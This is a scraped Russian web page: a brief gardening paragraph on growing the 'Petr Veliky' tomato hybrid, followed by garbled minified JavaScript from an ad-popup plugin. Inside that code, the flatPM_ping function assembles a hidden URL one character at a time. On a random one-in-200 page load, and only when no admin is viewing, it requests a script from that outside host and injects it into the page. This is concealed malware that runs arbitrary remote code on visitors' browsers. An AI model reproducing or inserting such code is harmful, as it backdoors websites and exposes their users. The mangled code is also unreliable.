Не помешает иметь в теплице два – три куста сорта Петр Великий, кто его сажал, тот с этим согласится. Собранный урожай пригодится для зимних заготовок. Бурые плоды, уложенные в ящики, доспевают и долго хранятся. Уход за гибридом не сложный, его стоит опробовать в новом сезоне.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};